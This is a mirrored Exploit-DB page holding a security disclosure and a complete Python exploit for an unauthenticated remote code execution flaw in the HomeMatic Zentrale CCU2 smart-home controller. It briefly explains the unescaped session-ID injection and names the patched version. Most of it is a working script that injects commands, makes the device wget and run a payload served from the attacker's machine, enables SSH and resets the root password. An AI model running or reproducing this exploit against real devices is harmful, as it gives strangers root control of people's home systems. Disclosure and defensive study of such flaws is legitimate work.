bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/45052.py
Offensive Security a2ac269de5 DB: 2018-07-19 
8 changes to exploits/shellcodes

JavaScript Core - Arbitrary Code Execution
QNAP Q'Center - change_passwd Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs RCE (Metasploit)
QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
HomeMatic Zentrale CCU2 - Remote Code Execution

MailGust 1.9 - Board Takeover SQL Injection
MailGust 1.9 - Board Takeover (SQL Injection)

Cyphor 0.19 - Board Takeover SQL Injection
Cyphor 0.19 - Board Takeover (SQL Injection)

versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection
versatileBulletinBoard 1.00 RC2 - Board Takeover (SQL Injection)

WordPress 2.6.1 - SQL Column Truncation Admin Takeover
WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)

Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover
Invision Power Board 1.x?/2.x/3.x - Admin Takeover

Joomla! < 3.6.4 - Admin TakeOver
Joomla! < 3.6.4 - Admin Takeover
PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation
PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation
Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection
Open-AudIT Community 2.1.1 - Cross-Site Scripting
FTP2FTP 1.0 - Arbitrary File Download
Modx Revolution < 2.6.4 - Remote Code Execution
2018-07-19 05:01:43 +00:00

140 lines
No EOL
3.6 KiB
Python
Executable file
Raw Blame History

# Exploit Title: HomeMatic Zentrale CCU2 Unauthenticated RCE
# Date: 16-07-2018
# Software Link: https://www.homematic.com/
# Exploit Author: Kacper Szurek - ESET
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote
1. Description
File: /root/www/api/backup/logout.cgi
```
proc main { } {
set sid [getQueryArg sid]
if [catch { session_logout $sid}] { error LOGOUT }
puts "Content-Type: text/plain"
puts ""
puts "OK"
}
```
`$sid` value is passed directly to `session_logout` function.
File: /root/www/tcl/eq3/session.tcl
```
proc session_logout { sid } {
rega_exec "system.ClearSessionID(\"$sid\");"
}
```
`$sid` value is not escaped properly.
We can close current rega script using `");` and execute our payload.
2. Proof of Concept
POC in Python which enable ssh access and change root password without any credentials.
```
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import time
import urllib2
import threading
import sys
import os
import signal
print "HomeMatic Zentrale CCU2 Unauthenticated RCE"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek - ESET"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek\n"
def signal_handler(a, b):
print "[+] Exit"
os._exit(0)
signal.signal(signal.SIGINT, signal_handler)
if len(sys.argv) != 4:
print "Usage: exploit <your_ip> <homematic_ip> <new_password>"
os._exit(0)
our_ip = sys.argv[1]
homematic_ip = sys.argv[2]
new_password = sys.argv[3]
tcl_file = """
#!/bin/tclsh
source /www/api/eq3/jsonrpc.tcl
source /www/api/eq3/json.tcl
set args(passwd) "{}"
set args(mode) "true"
source /www/api/methods/ccu/setssh.tcl
source /www/api/methods/ccu/setsshpassword.tcl
source /www/api/methods/ccu/restartsshdaemon.tcl
""".format(new_password)
class StoreHandler(BaseHTTPRequestHandler):
def do_GET(self):
print self.path
if self.path == '/exploit':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(tcl_file)
def server():
try:
server = HTTPServer((our_ip, 1234), StoreHandler)
server.serve_forever()
except Exception, e:
print "[-] Cannot start web server: {}".format(e)
os._exit(0)
def send_payload(payload):
return urllib2.urlopen('http://{}/api/backup/logout.cgi?sid=aa");system.Exec("{}");system.ClearSessionID("bb'.format(homematic_ip, payload)).read()
try:
version = urllib2.urlopen('http://{}/api/backup/version.cgi'.format(homematic_ip), timeout=6).read()
except:
version = ""
if not version.startswith('VERSION='):
print "[-] Probably not HomeMatic IP: {}".format(homematic_ip)
os._exit(0)
if "'" in new_password or '"' in new_password:
print "[-] Forbidden characters in password"
os._exit(0)
print "[+] Start web server"
t = threading.Thread(target=server)
t.daemon = True
t.start()
time.sleep(2)
print "[+] Download exploit"
send_payload('wget+-O+/tmp/exploit+http://{}:1234/exploit&&chmod+%2bx+/tmp/exploit'.format(our_ip))
print "[+] Set chmod +x"
send_payload('chmod+%2bx+/tmp/exploit')
print "[+] Execute exploit"
send_payload('/bin/tclsh+/tmp/exploit')
print "[+] Success, now you can ssh as root:"
print "ssh root@{}".format(homematic_ip)
print "Password: {}".format(new_password)
os._exit(0)
```
3. Solution:
Update to version 2.35.16
Reference in a new issue View git blame Copy permalink